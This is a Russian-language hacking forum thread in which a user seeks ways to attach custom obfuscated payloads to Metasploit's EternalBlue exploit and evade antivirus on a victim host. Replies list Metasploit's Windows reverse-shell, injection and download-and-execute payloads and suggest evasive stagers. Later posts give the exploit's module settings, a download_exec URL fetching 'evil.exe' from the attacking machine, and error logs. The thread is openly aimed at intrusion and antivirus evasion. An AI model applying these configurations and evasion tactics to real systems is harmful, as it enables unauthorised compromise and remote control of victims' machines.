Добрый день, форумчане! Помогите разобраться... Ситуация: Беру Metasploit выбираю эксплоит, к примеру, eternalblue. В качестве PAYLOAD можно выбрать, скажем, meterpreter. Основная проблема в том, что эта нагрузка не дает сессию и я подозреваю, что ее блокирует АВ. (В тестовых условиях, без АВ сессия прилетает). В интернетах куча статей про Shellter, Veil(кстати новый вышел), msfvenom и т.п. Но все, что я читал, просто генерируют, кодируют нагрузку, а дальше, как везде пишут, "доставляется на машину жертвы" и запускается. Теперь вопрос: Каким образом можно взять произвольную нагрузку(A)(например на powershell из Empire), прогнать ее через тот же Veil и получившийся файл(B) уже прикрутить к эксплоиту, тому же eternalblue. Подскажите чем больше способов, тем лучше. P. S. Я пробовал выбрать payload windows/exec, чтобы просто передать команду(А) для CMD. Но при любом значении CMD у меня ошибка - значение параметра не валидно. При этом если эту A запустить вручную на жертве, сессия приходит. P.P.S. Большинство стандартных нагрузок в msf уже содержат в себе инструкции для создания сессии, будь то реверс или бинд. Мне же нужно только доставить и запустить свой обфусцированный, кодированный и т.п. код.
Поехалиииии show payloads Spoiler: ТЫЦ Code: windows/adduser normal Windows Execute net user /ADD windows/dllinject/bind_hidden_ipknock_tcp normal Reflective DLL Injection, Hidden Bind Ipknock TCP Stager windows/dllinject/bind_hidden_tcp normal Reflective DLL Injection, Hidden Bind TCP Stager windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86) windows/dllinject/bind_ipv6_tcp_uuid normal Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7) windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager (Windows x86) windows/dllinject/bind_tcp_rc4 normal Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm) windows/dllinject/bind_tcp_uuid normal Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86) windows/dllinject/find_tag normal Reflective DLL Injection, Find Tag Ordinal Stager windows/dllinject/reverse_hop_http normal Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager windows/dllinject/reverse_http normal Reflective DLL Injection, Windows Reverse HTTP Stager (wininet) windows/dllinject/reverse_http_proxy_pstore normal Reflective DLL Injection, Reverse HTTP Stager Proxy windows/dllinject/reverse_ipv6_tcp normal Reflective DLL Injection, Reverse TCP Stager (IPv6) windows/dllinject/reverse_nonx_tcp normal Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) windows/dllinject/reverse_ord_tcp normal Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager windows/dllinject/reverse_tcp_dns normal Reflective DLL Injection, Reverse TCP Stager (DNS) windows/dllinject/reverse_tcp_rc4 normal Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm) windows/dllinject/reverse_tcp_rc4_dns normal Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) windows/dllinject/reverse_tcp_uuid normal Reflective DLL Injection, Reverse TCP Stager with UUID Support windows/dllinject/reverse_winhttp normal Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp) windows/dns_txt_query_exec normal DNS TXT Record Payload Download and Execution windows/download_exec normal Windows Executable Download (http,https,ftp) and Execute windows/exec normal Windows Execute Command windows/format_all_drives manual Windows Drive Formatter windows/loadlibrary normal Windows LoadLibrary Path windows/messagebox normal Windows MessageBox windows/meterpreter/bind_hidden_ipknock_tcp normal Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager windows/meterpreter/bind_hidden_tcp normal Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) windows/meterpreter/bind_ipv6_tcp_uuid normal Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86) windows/meterpreter/bind_tcp_rc4 normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) windows/meterpreter/bind_tcp_uuid normal Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) windows/meterpreter/find_tag normal Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager windows/meterpreter/reverse_hop_http normal Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet) windows/meterpreter/reverse_http_proxy_pstore normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet) windows/meterpreter/reverse_https_proxy normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) windows/meterpreter/reverse_named_pipe normal Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) windows/meterpreter/reverse_tcp_rc4 normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) windows/meterpreter/reverse_tcp_rc4_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) windows/meterpreter/reverse_tcp_uuid normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support windows/meterpreter/reverse_winhttp normal Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp) windows/meterpreter/reverse_winhttps normal Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp) windows/meterpreter_bind_tcp normal Windows Meterpreter Shell, Bind TCP Inline windows/meterpreter_reverse_http normal Windows Meterpreter Shell, Reverse HTTP Inline windows/meterpreter_reverse_https normal Windows Meterpreter Shell, Reverse HTTPS Inline windows/meterpreter_reverse_ipv6_tcp normal Windows Meterpreter Shell, Reverse TCP Inline (IPv6) windows/meterpreter_reverse_tcp normal Windows Meterpreter Shell, Reverse TCP Inline windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline windows/patchupdllinject/bind_hidden_ipknock_tcp normal Windows Inject DLL, Hidden Bind Ipknock TCP Stager windows/patchupdllinject/bind_hidden_tcp normal Windows Inject DLL, Hidden Bind TCP Stager windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86) windows/patchupdllinject/bind_ipv6_tcp_uuid normal Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7) windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager (Windows x86) windows/patchupdllinject/bind_tcp_rc4 normal Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm) windows/patchupdllinject/bind_tcp_uuid normal Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86) windows/patchupdllinject/find_tag normal Windows Inject DLL, Find Tag Ordinal Stager windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6) windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS) windows/patchupdllinject/reverse_tcp_rc4 normal Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm) windows/patchupdllinject/reverse_tcp_rc4_dns normal Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) windows/patchupdllinject/reverse_tcp_uuid normal Windows Inject DLL, Reverse TCP Stager with UUID Support windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager windows/patchupmeterpreter/bind_hidden_tcp normal Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86) windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86) windows/patchupmeterpreter/bind_tcp_rc4 normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) windows/patchupmeterpreter/bind_tcp_uuid normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86) windows/patchupmeterpreter/find_tag normal Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) windows/patchupmeterpreter/reverse_tcp_rc4 normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) windows/patchupmeterpreter/reverse_tcp_rc4_dns normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) windows/patchupmeterpreter/reverse_tcp_uuid normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support windows/powershell_bind_tcp normal Windows Interactive Powershell Session, Bind TCP windows/powershell_reverse_tcp normal Windows Interactive Powershell Session, Reverse TCP windows/shell/bind_hidden_ipknock_tcp normal Windows Command Shell, Hidden Bind Ipknock TCP Stager windows/shell/bind_hidden_tcp normal Windows Command Shell, Hidden Bind TCP Stager windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind IPv6 TCP Stager (Windows x86) windows/shell/bind_ipv6_tcp_uuid normal Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7) windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager (Windows x86) windows/shell/bind_tcp_rc4 normal Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm) windows/shell/bind_tcp_uuid normal Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86) windows/shell/find_tag normal Windows Command Shell, Find Tag Ordinal Stager windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6) windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7) windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS) windows/shell/reverse_tcp_rc4 normal Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) windows/shell/reverse_tcp_rc4_dns normal Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) windows/shell/reverse_tcp_uuid normal Windows Command Shell, Reverse TCP Stager with UUID Support windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline windows/shell_hidden_bind_tcp normal Windows Command Shell, Hidden Bind TCP Inline windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!" windows/upexec/bind_hidden_ipknock_tcp normal Windows Upload/Execute, Hidden Bind Ipknock TCP Stager windows/upexec/bind_hidden_tcp normal Windows Upload/Execute, Hidden Bind TCP Stager windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86) windows/upexec/bind_ipv6_tcp_uuid normal Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7) windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager (Windows x86) windows/upexec/bind_tcp_rc4 normal Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm) windows/upexec/bind_tcp_uuid normal Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86) windows/upexec/find_tag normal Windows Upload/Execute, Find Tag Ordinal Stager windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6) windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS) windows/upexec/reverse_tcp_rc4 normal Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm) windows/upexec/reverse_tcp_rc4_dns normal Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) windows/upexec/reverse_tcp_uuid normal Windows Upload/Execute, Reverse TCP Stager with UUID Support windows/vncinject/bind_hidden_ipknock_tcp normal VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager windows/vncinject/bind_hidden_tcp normal VNC Server (Reflective Injection), Hidden Bind TCP Stager windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) windows/vncinject/bind_ipv6_tcp_uuid normal VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (Windows x86) windows/vncinject/bind_tcp_rc4 normal VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) windows/vncinject/bind_tcp_uuid normal VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager windows/vncinject/reverse_hop_http normal VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet) windows/vncinject/reverse_http_proxy_pstore normal VNC Server (Reflective Injection), Reverse HTTP Stager Proxy windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS) windows/vncinject/reverse_tcp_rc4 normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) windows/vncinject/reverse_tcp_rc4_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) windows/vncinject/reverse_tcp_uuid normal VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support windows/vncinject/reverse_winhttp normal VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp) windows/x64/exec normal Windows x64 Execute Command windows/x64/loadlibrary normal Windows x64 LoadLibrary Path windows/x64/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager windows/x64/meterpreter/bind_ipv6_tcp_uuid normal Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support windows/x64/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager windows/x64/meterpreter/bind_tcp_uuid normal Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) windows/x64/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) windows/x64/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) windows/x64/meterpreter/reverse_named_pipe normal Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager windows/x64/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager windows/x64/meterpreter/reverse_tcp_uuid normal Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) windows/x64/meterpreter/reverse_winhttp normal Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) windows/x64/meterpreter/reverse_winhttps normal Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp) windows/x64/meterpreter_bind_tcp normal Windows Meterpreter Shell, Bind TCP Inline (x64) windows/x64/meterpreter_reverse_http normal Windows Meterpreter Shell, Reverse HTTP Inline (x64) windows/x64/meterpreter_reverse_https normal Windows Meterpreter Shell, Reverse HTTPS Inline (x64) windows/x64/meterpreter_reverse_ipv6_tcp normal Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) windows/x64/meterpreter_reverse_tcp normal Windows Meterpreter Shell, Reverse TCP Inline x64 windows/x64/powershell_bind_tcp normal Windows Interactive Powershell Session, Bind TCP windows/x64/powershell_reverse_tcp normal Windows Interactive Powershell Session, Reverse TCP windows/x64/shell/bind_ipv6_tcp normal Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager windows/x64/shell/bind_ipv6_tcp_uuid normal Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support windows/x64/shell/bind_tcp normal Windows x64 Command Shell, Windows x64 Bind TCP Stager windows/x64/shell/bind_tcp_uuid normal Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64) windows/x64/shell/reverse_tcp normal Windows x64 Command Shell, Windows x64 Reverse TCP Stager windows/x64/shell/reverse_tcp_uuid normal Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64) windows/x64/shell_bind_tcp normal Windows x64 Command Shell, Bind TCP Inline windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline windows/x64/vncinject/bind_ipv6_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager windows/x64/vncinject/bind_ipv6_tcp_uuid normal Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager windows/x64/vncinject/bind_tcp_uuid normal Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64) windows/x64/vncinject/reverse_http normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) windows/x64/vncinject/reverse_https normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager windows/x64/vncinject/reverse_tcp_uuid normal Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64) windows/x64/vncinject/reverse_winhttp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp) windows/x64/vncinject/reverse_winhttps normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp) А теперь отвечаю на вопросы. Начнем с reverse_tcp. Меняешь на dns, https и так далее. Если сессия отваливается то старый добрый windows/shell/reverse_tcp_dns А может проще vnc прокинуть? windows/vncinject/reverse_http А разрядность соблюдена? windows/x64/exec Ну а всё же если хочется свой payload то payload/windows/download_exec Или же.... Пишем свой Пример скилета тут https://github.com/rapid7/metasploi.../modules/payloads/stagers/windows/bind_tcp.rb
Имеются ли знающие в данном деле (експлойты, пейлоады) люди, которые смогут довести до ума данный софт с масканом, автозагрузкой експлойтами и т.д?
SoolFaa, спасибо за ответ. Прокомментирую по порядку... 1. Нагрузки пробовал менять, сессия не прилетает, хотя, например, запросы на 80 порт (http) целевой хост разрешает. 2. windows/shell/reverse_tcp_dns - попробую. 3. Просто windows/vncinject/reverse_http не срабатывает. А вот если сначала получить сессию метерпретера , а потом через payload/inject запихнуть vncinject, то все работает. Но такой вариант не актуален. 4. Целевой хост с архитектурой x86, за этим слежу. 5. Была большая надежда на payload/windows/download_exec. Это как раз то что нужно, но сессия не приходит. Хотя если по url зайти вручную с целевого хоста, все срабатывает отлично. Можно тогда пока сузить область вопроса.... 1. Почему не прилетает сессия с payload/windows/download_exec? 2. Почему в windows/exec c параметром CND=calc.exe вылетает ошибка "could not validate CMD"?
Таргет - Windows 7 Sp1 x86 сборка 7601. Атакующий хост - KaliLinux 2017.3 Эксплоит - eternalblue_doublepulsar
1) Дело не в нагрузке, а в способе запуска. Анивирь ловит любые способы инжекта в процесс/детектит рефлектив. 2) CND=calc.exe Надо CMD.
1) АВ выключен. Кроме того Этот же exe-шник, но руками зарущенный на таргете дает сессию на отлично. В данном случае АВ ни при чем. 2) с CND - это опечатка, так то я правильно ввожу. Вот такая ошибка на выходе - The following options failed to validate: CMD
1) Есть кириллица в пути? 2) Возможно ругается из-за кавычек Ждём скрин с заполнением параметров (SET CMD calc.exe....)
1. http://192.168.137.128/evil.exe Повторюсь, вручную на таргете ссылка работает. 2. Code: Module options (exploit/windows/smb/eternalblue_doublepulsar): Name Current Setting Required Description ---- --------------- -------- ----------- DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue PROCESSINJECT spoolsv.exe yes Name of process to inject into (Change to lsass.exe for x64) RHOST 192.168.137.130 yes The target address RPORT 445 yes The SMB service port (TCP) TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64) WINEPATH /root/.wine/drive_c/ yes WINE drive_c path Payload options (windows/exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD calc.exe yes The command string to execute EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) Результат: Code: [*] 192.168.137.130:445 - Generating Eternalblue XML data [*] 192.168.137.130:445 - Generating Doublepulsar XML data [*] 192.168.137.130:445 - Generating payload DLL for Doublepulsar [-] 192.168.137.130:445 - Exploit failed: Msf::OptionValidateError The following options failed to validate: CMD. [*] Exploit completed, but no session was created.
Уважаемые модеры, может лучше переименовать топик, так как суть вопроса немного изменилась? Теперь проблема в том, что не работают конкретные payload-ы...
